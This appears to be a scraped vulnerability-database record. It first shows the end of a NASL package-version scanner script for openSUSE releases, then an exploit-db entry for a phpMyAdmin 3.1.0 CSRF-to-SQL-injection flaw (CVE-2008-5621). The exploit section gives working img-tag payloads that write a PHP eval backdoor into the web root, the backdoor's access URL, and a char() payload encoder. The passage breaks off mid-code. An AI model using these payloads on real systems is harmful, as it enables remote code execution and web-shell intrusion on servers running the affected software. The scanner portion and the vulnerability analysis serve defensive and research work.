isrpmvuln(pkg:\"gtk2\", rpm:\"gtk2~2.14.4~6.4.5\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gtk2-branding-upstream\", rpm:\"gtk2-branding-upstream~2.14.4~6.4.5\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gtk2-devel\", rpm:\"gtk2-devel~2.14.4~6.4.5\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gtk2-doc\", rpm:\"gtk2-doc~2.14.4~6.4.5\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gtk2-lang\", rpm:\"gtk2-lang~2.14.4~6.4.5\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"hal\", rpm:\"hal~0.5.12~10.12.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"hal-devel\", rpm:\"hal-devel~0.5.12~10.12.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = 
isrpmvuln(pkg:\"libattr\", rpm:\"libattr~2.4.43~2.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libattr-devel\", rpm:\"libattr-devel~2.4.43~2.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-client3\", rpm:\"libavahi-client3~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-common3\", rpm:\"libavahi-common3~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-core5\", rpm:\"libavahi-core5~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-devel\", rpm:\"libavahi-devel~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-glib-devel\", rpm:\"libavahi-glib-devel~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-glib1\", rpm:\"libavahi-glib1~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-gobject-devel\", rpm:\"libavahi-gobject-devel~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-gobject0\", rpm:\"libavahi-gobject0~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-ui0\", rpm:\"libavahi-ui0~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libdns_sd\", rpm:\"libdns_sd~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libhowl0\", rpm:\"libhowl0~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl-devel\", rpm:\"libopenssl-devel~0.9.8h~28.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl0_9_8\", rpm:\"libopenssl0_9_8~0.9.8h~28.7.1\", rls:\"openSUSE11.1\")) != 
NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpng-devel\", rpm:\"libpng-devel~1.2.31~4.35.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpng3\", rpm:\"libpng3~1.2.31~4.35.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpng12-0\", rpm:\"libpng12-0~1.2.31~4.35.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libxml2\", rpm:\"libxml2~2.7.1~8.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libxml2-devel\", rpm:\"libxml2-devel~2.7.1~8.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libxml2-doc\", rpm:\"libxml2-doc~2.7.1~8.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"mailman\", rpm:\"mailman~2.1.11~8.6.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~0.9.8h~28.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-doc\", rpm:\"openssl-doc~0.9.8h~28.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"perl-Bootloader\", rpm:\"perl-Bootloader~0.4.81.1~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"plotutils\", rpm:\"plotutils~2.5~197.10.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pure-ftpd\", rpm:\"pure-ftpd~1.0.21~182.32.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"python-avahi\", rpm:\"python-avahi~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"sudo\", rpm:\"sudo~1.6.9p17~10.36.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"tsclient\", rpm:\"tsclient~2.0.2~2.29.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = 
isrpmvuln(pkg:\"tsclient-devel\", rpm:\"tsclient-devel~2.0.2~2.29.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xrdp\", rpm:\"xrdp~0.4.1~16.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"yast2-bootloader\", rpm:\"yast2-bootloader~2.17.50~1.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"yast2-network\", rpm:\"yast2-network~2.17.66~1.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"yast2-network-devel-doc\", rpm:\"yast2-network-devel-doc~2.17.66~1.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok\", rpm:\"amarok~1.4.9.1~27.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok-lang\", rpm:\"amarok-lang~1.4.9.1~27.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok-libvisual\", rpm:\"amarok-libvisual~1.4.9.1~27.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok-xine\", rpm:\"amarok-xine~1.4.9.1~27.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok-yauap\", rpm:\"amarok-yauap~1.4.9.1~27.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"attr\", rpm:\"attr~2.4.43~2.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"audiofile\", rpm:\"audiofile~0.2.6~115.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"audiofile-devel\", rpm:\"audiofile-devel~0.2.6~115.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi\", rpm:\"avahi~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-compat-howl-devel\", rpm:\"avahi-compat-howl-devel~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = 
isrpmvuln(pkg:\"avahi-compat-mDNSResponder-devel\", rpm:\"avahi-compat-mDNSResponder-devel~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-utils\", rpm:\"avahi-utils~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-utils-gtk\", rpm:\"avahi-utils-gtk~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.4.2~39.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-chrootenv\", rpm:\"bind-chrootenv~9.4.2~39.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.4.2~39.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-doc\", rpm:\"bind-doc~9.4.2~39.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.4.2~39.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.4.2~39.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"compat-openssl097g\", rpm:\"compat-openssl097g~0.9.7g~119.3\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libattr\", rpm:\"libattr~2.4.43~2.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libattr-devel\", rpm:\"libattr-devel~2.4.43~2.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-client3\", rpm:\"libavahi-client3~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-common3\", rpm:\"libavahi-common3~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-core5\", rpm:\"libavahi-core5~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif 
((res = isrpmvuln(pkg:\"libavahi-devel\", rpm:\"libavahi-devel~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-glib-devel\", rpm:\"libavahi-glib-devel~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-glib1\", rpm:\"libavahi-glib1~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-gobject-devel\", rpm:\"libavahi-gobject-devel~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-gobject0\", rpm:\"libavahi-gobject0~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-ui0\", rpm:\"libavahi-ui0~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libdns_sd\", rpm:\"libdns_sd~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libhowl0\", rpm:\"libhowl0~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libnasl\", rpm:\"libnasl~2.2.10~59.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl-devel\", rpm:\"libopenssl-devel~0.9.8g~47.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl0_9_8\", rpm:\"libopenssl0_9_8~0.9.8g~47.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpng-devel\", rpm:\"libpng-devel~1.2.26~14.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpng3\", rpm:\"libpng3~1.2.26~14.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpng12-0\", rpm:\"libpng12-0~1.2.26~14.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"nouveau-kmp-debug\", rpm:\"nouveau-kmp-debug~0.10.1.20081112_2.6.25.18_0.2~0.3\", 
rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"nouveau-kmp-default\", rpm:\"nouveau-kmp-default~0.10.1.20081112_2.6.25.18_0.2~0.3\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"nouveau-kmp-pae\", rpm:\"nouveau-kmp-pae~0.10.1.20081112_2.6.25.18_0.2~0.3\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"nouveau-kmp-xen\", rpm:\"nouveau-kmp-xen~0.10.1.20081112_2.6.25.18_0.2~0.3\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.8~14.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~0.9.8g~47.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-certs\", rpm:\"openssl-certs~0.9.8g~47.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-doc\", rpm:\"openssl-doc~0.9.8g~47.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"python-avahi\", rpm:\"python-avahi~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"sudo\", rpm:\"sudo~1.6.9p15~13.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"syslog-ng\", rpm:\"syslog-ng~1.6.12~76.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xorg-x11-driver-video-nouveau\", rpm:\"xorg-x11-driver-video-nouveau~0.10.1.20081112~0.3\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xorg-x11-driver-video-nouveau-3d\", rpm:\"xorg-x11-driver-video-nouveau-3d~0.10.1.20081112~0.3\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok\", rpm:\"amarok~1.4.7~37.6\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok-lang\", rpm:\"amarok-lang~1.4.7~37.6\", rls:\"openSUSE10.3\")) != NULL) 
{\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok-libvisual\", rpm:\"amarok-libvisual~1.4.7~37.6\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok-xine\", rpm:\"amarok-xine~1.4.7~37.6\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok-yauap\", rpm:\"amarok-yauap~1.4.7~37.6\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"audiofile\", rpm:\"audiofile~0.2.6~77.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"audiofile-devel\", rpm:\"audiofile-devel~0.2.6~77.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi\", rpm:\"avahi~0.6.20~40.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-compat-howl\", rpm:\"avahi-compat-howl~0.6.20~40.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-compat-howl-devel\", rpm:\"avahi-compat-howl-devel~0.6.20~40.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-compat-mDNSResponder\", rpm:\"avahi-compat-mDNSResponder~0.6.20~40.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-compat-mDNSResponder-devel\", rpm:\"avahi-compat-mDNSResponder-devel~0.6.20~40.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-devel\", rpm:\"avahi-devel~0.6.20~40.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-glib\", rpm:\"avahi-glib~0.6.20~40.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-python\", rpm:\"avahi-python~0.6.20~40.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-qt3\", rpm:\"avahi-qt3~0.6.20~40.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-qt4\", 
rpm:\"avahi-qt4~0.6.20~40.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.4.1.P1~12.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-chrootenv\", rpm:\"bind-chrootenv~9.4.1.P1~12.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.4.1.P1~12.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-doc\", rpm:\"bind-doc~9.4.1.P1~12.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.4.1.P1~12.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.4.1.P1~12.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"compat-openssl097g\", rpm:\"compat-openssl097g~0.9.7g~75.5\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-bigsmp\", rpm:\"kernel-bigsmp~2.6.22.19~0.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.22.19~0.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~2.6.22.19~0.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~2.6.22.19~0.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~2.6.22.19~0.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.22.19~0.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xenpae\", rpm:\"kernel-xenpae~2.6.22.19~0.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libnasl\", 
rpm:\"libnasl~2.2.10~15.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl-devel\", rpm:\"libopenssl-devel~0.9.8e~45.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl0_9_8\", rpm:\"libopenssl0_9_8~0.9.8e~45.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpng\", rpm:\"libpng~1.2.18~15.6\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpng-devel\", rpm:\"libpng-devel~1.2.18~15.6\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~0.9.8e~45.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-certs\", rpm:\"openssl-certs~0.9.8e~45.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-doc\", rpm:\"openssl-doc~0.9.8e~45.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"sudo\", rpm:\"sudo~1.6.9p2~23.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"syslog-ng\", rpm:\"syslog-ng~1.6.12~33.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-01T03:05:41", "description": "phpMyAdmin 3.1.0 (XSRF) SQL Injection Vulnerability. CVE-2008-5621. 
Webapps exploit for php platform", "published": "2008-12-08T00:00:00", "type": "exploitdb", "title": "phpMyAdmin 3.1.0 - CSRF SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-5621"], "modified": "2008-12-08T00:00:00", "id": "EDB-ID:7382", "href": "https://www.exploit-db.com/exploits/7382/", "sourceData": "Written by Michael Brooks\r\nSpecial Thanks to str0ke and rGod\r\n\r\nIntro:\r\nphpMyAdmin is by far the most popular PHP project. Between\r\nphpmyadmin and the xampp project there are more than 34+ million\r\ndownloads from sourceforge.net . This exploit was released along\r\nside XSRF attacks against XAMPP and Simple Directory Listing\r\neffectively breaking the top 3 php projects in the same day.\r\n\r\nVulnerable Software info:\r\nSQL injection in phpMyAdmin by means of XSRF.\r\nExploit tested on Version 3.1.0 release on: 2008-12-01\r\nWorks with magic_quotes_gpc=On or Off.\r\n\r\nExploit information:\r\nThis is a Remote php code execution PoC exploit. The exploit is\r\ndropping a php backdoor into /var/www/backdoor.php, this attack will\r\nnot work on the newest Ubuntu or Fedora... 
machines due to AppArmor\r\nand SELinux respectively.\r\n\r\nThis is a XSRF attack to access SQL Injection so the same rules for\r\nexecuting XSRF attacks still apply.\r\nSteps for exploitation:\r\n1)The Victim's browser must be authenticated to phpMyAdmin at the time\r\nof attack.\r\n2)You must know the URL to phpMyAdmin.\r\n3)Finly, to execute the attack the Victim's browser then needs to\r\nview the malicious img tag:\r\n\r\nExploit for *nix:\r\n<html>\r\n<img src=\"http://10.1.1.10/phpmyadmin/tbl_structure.php?db=information_schema&table=TABLES%60+where+0+union+select+char%2860%2C+63%2C+112%2C+104%2C+112%2C+32%2C+101%2C+118%2C+97%2C+108%2C+40%2C+36%2C+95%2C+71%2C+69%2C+84%2C+91%2C+101%2C+93%2C+41%2C+63%2C+62%29+into+outfile+%22%2Fvar%2Fwww%2Fbackdoor.php%22+--+1\">\r\n</html>\r\npath:\r\n/var/www/backdoor.php\r\nbackdoor:\r\n<?php eval($_GET[e]);?>\r\n\r\nExploit for a Default XAMPP for Windows Version 1.6.8:\r\n<html>\r\n<img src=\"http://10.1.1.10/phpmyadmin/tbl_structure.php?db=information_schema&table=TABLES%60+where+0+union+select+char%2860%2C+63%2C+112%2C+104%2C+112%2C+32%2C+101%2C+118%2C+97%2C+108%2C+40%2C+115%2C+116%2C+114%2C+105%2C+112%2C+115%2C+108%2C+97%2C+115%2C+104%2C+101%2C+115%2C+40%2C+36%2C+95%2C+71%2C+69%2C+84%2C+91%2C+101%2C+93%2C+41%2C+41%2C+59%2C+63%2C+62%29+into+outfile+%22c%3A%2Fxampp%2Fhtdocs%2Fbackdoor.php%22+--+1\">\r\n</html>\r\npath:\r\nc:/xampp/htdocs/backdoor.php\r\nbackdoor:\r\n<?php eval(stripslashes($_GET[e]));?>\r\n\r\nThe backdoor can be accessed via\r\nhttp://10.1.1.10/backdoor.php?e=phpinfo();\r\n\r\nAs a side note, this attack is only GET based so no JavaScript or\r\nActionScript required! 
Screw you NoScript!!!\r\n\r\n\r\nTechnical Details:\r\nThe exact sql query that is being executed:\r\nSELECT COUNT(*) FROM `TABLES` where 0 union select char(60, 63, 112,\r\n104, 112, 32, 101, 118, 97, 108, 40, 36, 95, 71, 69, 84, 91, 101, 93,\r\n41, 63, 62) into outfile \"/var/www/backdoor.php\" -- 1`;\r\n\r\nThe char() mysql function is being used because the first SQL query is\r\nselecting integer values. The following php code can be used to\r\nbuild a custom payload, the current payload is: <?php\r\neval($_GET[e])?>\r\n\r\n<?php\r\nprint charEncode($_GET[code]);\r\nfunction charEncode($string){\r\n\t$char=\"char(\";\r\n\t$size=strlen($string);\r\n\tfor($x=0;$x<$size;$x++){\r\n\t\t$char.=ord($string[$x]).\", \";\r\n\t}\r\n\t$char[strlen($char)-2]=\")%00\";\r\n\treturn $char;\r\n}\r\n?>\r\nretroGod showed me this encoding method back when milw0rm still had a forum.\r\n\r\nBy default, if this query is malformed it will redirect you to a\r\nblank query window. This fooled me for a while, but then I modified\r\na line and then I could see that I was in fact causing a mysql error.\r\n./phpmyadmin/libraries/dbi/mysql.dbi.lib.php line 126:\r\nreturn mysql_query($query,$link);\r\nchange it to:\r\nreturn mysql_query($query,$link) or die($query.\"<br>\".mysql_error($link));\r\n\r\nThe query that is vulnerable to sql injection is being built in\r\n./phpmyadmin/libraries/db_table_exists.lib.php on line: 63\r\n\t\t$_result = PMA_DBI_try_query(\r\n 'SELECT COUNT(*) FROM `' .\r\nPMA_sqlAddslashes($table, true) . '`;',\r\n null, PMA_DBI_QUERY_STORE);\r\n\t\t\r\nThe PMA_sqlAddslashes() only disrupts the use of single quotes '.\r\nThis function doesn't protect against sql injection because it ignores\r\nback-ticks ` and double-quotes \".\r\n\r\n\r\nThis attack is not a textbook example of XSRF, because phpMyAdmin does\r\nhave protection against XSRF. 
The token used to protect requests is\r\ngenerated in a secure manner:\r\n./phpmyadmin/libraries/session.ic.php line 96:\r\nif (!isset($_SESSION[' PMA_token '])) {\r\n $_SESSION[' PMA_token '] = md5(uniqid(rand(), true));\r\n}\r\nAs a note the call to md5(); is superstitious. It neither adds to nor\r\nsubtracts from the session security. Possible md5() collisions do\r\nnot affect the integrity of the cryptographic nonce.\r\n\r\nThe vulnerability exists because some request variables are exempt from\r\nthe token's protection. For instance the request variables 'db' and\r\n'table' used in the attack are not unset().\r\n./phpmyadmin/libraries/common.inc.php line 389:\r\nif (! PMA_isValid($_REQUEST['token']) || $_SESSION[' PMA_token '] !=\r\n$_REQUEST['token']) {\r\n /**\r\n * List of parameters which are allowed from unsafe source\r\n */\r\n $allow_list = array(\r\n /* needed for direct access, see FAQ 1.34\r\n * also, server needed for cookie login screen (multi-server)\r\n */\r\n 'server', 'db', 'table', 'target',\r\n /* Session ID */\r\n 'phpMyAdmin',\r\n /* Cookie preferences */\r\n 'pma_lang', 'pma_charset', 'pma_collation_connection',\r\n /* Possible login form */\r\n 'pma_servername', 'pma_username', 'pma_password',\r\n /* rajk - for playing blobstreamable media */\r\n 'media_type', 'custom_type', 